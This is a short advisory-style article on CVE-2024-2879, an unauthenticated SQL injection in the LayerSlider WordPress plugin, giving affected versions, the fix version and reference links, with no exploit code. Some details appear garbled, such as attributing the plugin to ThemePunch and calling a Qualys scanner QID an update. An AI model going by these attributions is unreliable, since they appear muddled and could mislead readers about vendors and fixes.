WordPress LayerSlider Plugin Encountered SQL Injection Vulnerability
On March 25th, 2024, a significant security vulnerability, CVE-2024-2879, was discovered in the LayerSlider plugin for WordPress. This vulnerability falls under the OWASP Top 10 Injection category and poses a serious threat to WordPress websites using the LayerSlider plugin.
The SQL injection vulnerability arises due to insufficient escaping on user-supplied parameters and lack of sufficient preparation on existing SQL queries. This issue is found within the function of the class, where user-provided input is not properly validated.
The vulnerability affects versions 7.9.11 through 7.10.0 of the LayerSlider plugin. As a result, unauthenticated attackers can append additional SQL queries into existing queries, potentially extracting sensitive information from the database.
To address this issue, the company behind the LayerSlider plugin, Revolution Slider (ThemePunch), released update QID 150868 to fix the SQL injection vulnerability CVE-2024-2879. Customers are advised to upgrade to LayerSlider 7.10.1 or a later version to remediate the vulnerability.
For more details about CVE-2024-2879, you can refer to the National Vulnerability Database at https://nvd.nist.gov/vuln/detail/CVE-2024-2879. Additional information about the vulnerability can be found on the Wordfence blog at https://www.wordfence.com/blog/2024/04/5500-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-layerslider-wordpress-plugin/.
The Wordfence Threat Intelligence page also provides information about the vulnerability at https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/layerslider/layerslider-7911-7100-unauthenticated-sql-injection. The QID for this issue is named: WordPress LayerSlider Plugin: Unauthenticated SQL Injection Vulnerability (CVE-2024-2879).
This article is also related to the Casdoor SQL Injection (CVE-2022-24124) and the Protect Against the Joomla SQL Injection Vulnerability. Sheela Sarva, Director of Web Application Security at Qualys, contributed to the discovery of the vulnerability.
Customers can detect CVE-2024-2879 with Qualys Web Application Scanning using QID 150868. For more information about the upgrade, you can refer to the LayerSlider Release logs.
Other related topics include August 2018 Patch Tuesday - 63 Vulns, L1TF (Foreshadow), Exchange, SQL, Active Attacks on IE flaw.
